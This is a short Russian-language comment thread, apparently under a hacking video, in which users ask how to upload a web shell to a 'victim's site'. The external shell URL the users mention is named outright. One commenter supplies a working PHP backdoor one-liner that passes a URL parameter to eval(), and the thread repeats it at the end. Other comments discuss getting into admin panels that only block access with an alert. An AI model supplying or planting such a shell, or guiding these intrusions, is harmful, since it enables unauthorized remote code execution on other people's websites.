Молодец пончик. Так держать. Может и в моа возьмут

__________________

• Ukrainian Security Community – Блог спеціалістів з безпеки веб-додатків
• Security Audit

MoDL

Ета команда показавает всю инфу о ПХП :
А что надо прописать, чтобы отсюда -> http://globnet.oo.lv/shell.php загрузить шелл на сайт жертвы ???

Я всегда нелюбил людей которые тупо повторяют то что видят, нужно свои мозги иметь! Хотя чё я ждал снимая это видео, конечно привалят имено такие...
В общем заливай <? stripslashes(eval($_GET[c])); ?> но stripslashes() не всегда надо, не везде экранирование, но на 90% серваках, а дальше тебе палюбому надо знать PHP, скачай книгу "самоучитель по PHP" и пачитай, там дальше поймёш

Круто. 10\10. Можно вопрос я За шол на какойто му в админку сам узнал как заходить не повторял как у тебя.Когда я хочу что там сменит меня снова выкидывает в админку в начало и не меняется,что делать? обращаюсь к тебе т.к ты понимаешь в этом деле.

ну впринцыпе ничего фантастического, но вопрос, как ты нашел багу, где в админку не пускает тупо только алертом =)))) за это молодец.

Ну вот...как ето понять
Тут понятнее
понятно куда заливаешь, и в какой фаил

может быть так и куда свой сайт вписовать (откуда шелл закачивать надо) ?

Ronny,тебе сказали уже куда и как,я всё понял с 1 раза.Хоть я это не знал!

Ну может обясниш...мне тупому человеку ???

<? stripslashes(eval($_GET[c])); ?> stripslashes()